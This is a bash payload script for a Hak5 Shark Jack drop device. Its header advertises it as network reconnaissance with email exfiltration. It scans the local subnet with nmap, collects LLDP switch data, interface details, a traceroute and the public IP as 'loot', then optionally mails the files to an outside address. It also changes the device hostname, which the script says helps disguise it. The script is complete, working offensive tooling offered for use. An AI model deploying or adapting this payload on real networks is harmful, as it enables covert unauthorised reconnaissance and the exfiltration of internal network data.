#!/bin/bash # # Title: Network Recon Payload with email exfiltration # Author: Topknot (Based on the orignial HAK5 sample payload and MonsieurMarc Sample Nmap Payload with Patebil exfiltration) # Version: 1.2 # # This payload: # # Version 1.1: Make e-mail optional, set DNS as variable # Version 1.2: Add ability to change system hostname # # Performs an nmap ping scan of the local subnet and logs it to a text file # Pulls LLDP neighbor and switch information and logs it to a text file # Performs an IFconfig and ip addr show and logs it to a text file # Performs a traceroute to 8.8.8.8 and logs it to a text file # Performs a public IP address lookup via curl and icanhazip.com and logs it to a text file # Optionally sends all of the created text files via email to the address set with MAIL_RCPT # # A nameserver, 1.1.1.1 by default, is set for the payload in case you want to run it in arming mode. # The HOSTNAME variable can be set to change the system hostname, helping disguise # # This payload requires you to have curl, lldpd, and (optionally) msmtp mutt already installed and configured via opkg # # Guide for MSMTP MUTT can be found here https://forum.openwrt.org/t/openwrt-how-to-send-mail-with-attachment-with-mutt-and-msmtp-gmail/45844 # # Red ...........Setup # Amber..........Scanning # Green..........Finished # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. # # Please enter your email details below. Set SEND_EMAIL=y to send e-mail. # SEND_EMAIL=n MAIL_RCPT=EnterEmail@Here.com NMAP_OPTIONS="-sP" LOOT_DIR_NMAP=/root/loot/nmap LOOT_DIR_LLDPD=/root/loot/lldpd LOOT_DIR_IFCONFIG=/root/loot/ifconfig LOOT_DIR_TRACEROUTE=/root/loot/traceroute LOOT_DIR_ICANHAZIP=/root/loot/icanhazip SCAN_DIR=/etc/shark/nmap LLDPD_DIR=/etc/shark/lldpd IFCONFIG_DIR=/etc/shark/ifconfig TRACEROUTE_DIR=/etc/shark/traceroute ICANHAZIP_DIR=/etc/shark/icanhazip DNS_FILE=/etc/resolv.conf MUTT_FILE=/root/.muttrc NAMESERVER=1.1.1.1 HOSTNAME=shark function finish() { LED CLEANUP # Kill Nmap wait $1 kill $1 &> /dev/null # Sync filesystem echo $SCAN_M > $SCAN_FILE echo $LLDPD_M > $LLDPD_FILE echo $IFCONFIG_M > $IFCONFIG_FILE echo $TRACEROUTE_M > $TRACEROUTE_FILE echo $ICANHAZIP_M > $ICANHAZIP_FILE sync sleep 1s #Email the loot as an attachment if [ $SEND_EMAIL = "y" ]; then email sleep 5s fi LED FINISH sleep 1s # Halt system halt } function setup() { LED SETUP # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done # Configure DNS Server echo "nameserver " $NAMESERVER > $DNS_FILE # Create loot directory mkdir -p $LOOT_DIR_NMAP &> /dev/null # Create tmp scan directory mkdir -p $SCAN_DIR &> /dev/null # Create tmp scan file if it doesn't exist SCAN_FILE=$SCAN_DIR/scan-count if [ ! -f $SCAN_FILE ]; then touch $SCAN_FILE && echo 0 > $SCAN_FILE fi # Create lldpd loot directory mkdir -p $LOOT_DIR_LLDPD &> /dev/null #Create tmp lldpd directory mkdir -p $LLDPD_DIR &> /dev/null #Create tmp lldpd file if it doesn't exist LLDPD_FILE=$LLDPD_DIR/lldpd-count if [ ! -f $LLDPD_FILE ]; then touch $LLDPD_FILE && echo 0 > $LLDPD_FILE fi # Create ifconfig loot directory mkdir -p $LOOT_DIR_IFCONFIG &> /dev/null #Create tmp ifconfig directory mkdir -p $IFCONFIG_DIR &> /dev/null #Create tmp ifconfig file if it doesn't exist IFCONFIG_FILE=$IFCONFIG_DIR/ifconfig-count if [ ! -f $IFCONFIG_FILE ]; then touch $IFCONFIG_FILE && echo 0 > $IFCONFIG_FILE fi # Create traceroute loot directory mkdir -p $LOOT_DIR_TRACEROUTE &> /dev/null #Create tmp traceroute directory mkdir -p $TRACEROUTE_DIR &> /dev/null #Create tmp traceroute file if it doesn't exist TRACEROUTE_FILE=$TRACEROUTE_DIR/traceroute-count if [ ! -f $TRACEROUTE_FILE ]; then touch $TRACEROUTE_FILE && echo 0 > $TRACEROUTE_FILE fi # Create icanhazip loot directory mkdir -p $LOOT_DIR_ICANHAZIP &> /dev/null #Create tmp icanhazip directory mkdir -p $ICANHAZIP_DIR &> /dev/null #Create tmp icanhazip file if it doesn't exist ICANHAZIP_FILE=$ICANHAZIP_DIR/icanhazip-count if [ ! -f $ICANHAZIP_FILE ]; then touch $ICANHAZIP_FILE && echo 0 > $ICANHAZIP_FILE fi # Set system hostname uci set system.@system[0].hostname=$HOSTNAME uci commit system /etc/init.d/system reload # Find IP address and subnet while [ -z "$SUBNET" ]; do sleep 1s && find_subnet done } function find_subnet() { SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') } function run() { # Run setup setup #Preflight NMAP SCAN_N=$(cat $SCAN_FILE) SCAN_M=$(( $SCAN_N + 1 )) LED ATTACK #Start nmap scan nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR_NMAP/nmap-scan_$SCAN_M.txt &>/dev/null & tpid=$! # Preflight LLDPD LLDPD_N=$(cat $LLDPD_FILE) LLDPD_M=$(( $LLDPD_N + 1 )) #Start LLDPD lldpcli show neighbor details > $LOOT_DIR_LLDPD/lldpd_$LLDPD_M.txt lldpcli show interfaces details >> $LOOT_DIR_LLDPD/lldpd_$LLDPD_M.txt # Preflight IFCONFIG IFCONFIG_N=$(cat $IFCONFIG_FILE) IFCONFIG_M=$(( $IFCONFIG_N + 1 )) #Start IFCONFIG ifconfig eth0 > $LOOT_DIR_IFCONFIG/ifconfig_$IFCONFIG_M.txt ip addr show dev eth0 >> $LOOT_DIR_IFCONFIG/ifconfig_$IFCONFIG_M.txt # Preflight TRACEROUTE TRACEROUTE_N=$(cat $TRACEROUTE_FILE) TRACEROUTE_M=$(( $TRACEROUTE_N + 1 )) #Start TRACEROUTE traceroute 8.8.8.8 > $LOOT_DIR_TRACEROUTE/traceroute_$TRACEROUTE_M.txt # Preflight ICANHAZIP ICANHAZIP_N=$(cat $ICANHAZIP_FILE) ICANHAZIP_M=$(( $ICANHAZIP_N + 1 )) #Start ICANHAZIP curl icanhazip.com > $LOOT_DIR_ICANHAZIP/icanhazip_$ICANHAZIP_M.txt #End Payloads finish $tpid } function email() { #Send the loot files to the email destination via msmtp echo "Yarr, You have new loot from Shark Jack!" | mutt -F $MUTT_FILE -a $LOOT_DIR_NMAP/nmap-scan_$SCAN_M.txt -a $LOOT_DIR_LLDPD/lldpd_$LLDPD_M.txt -a $LOOT_DIR_IFCONFIG/ifconfig_$IFCONFIG_M.txt -a $LOOT_DIR_TRACEROUTE/traceroute_$TRACEROUTE_M.txt -a $LOOT_DIR_ICANHAZIP/icanhazip_$ICANHAZIP_M.txt -s "Shark Jack Loot" -- $MAIL_RCPT } # Run payload run &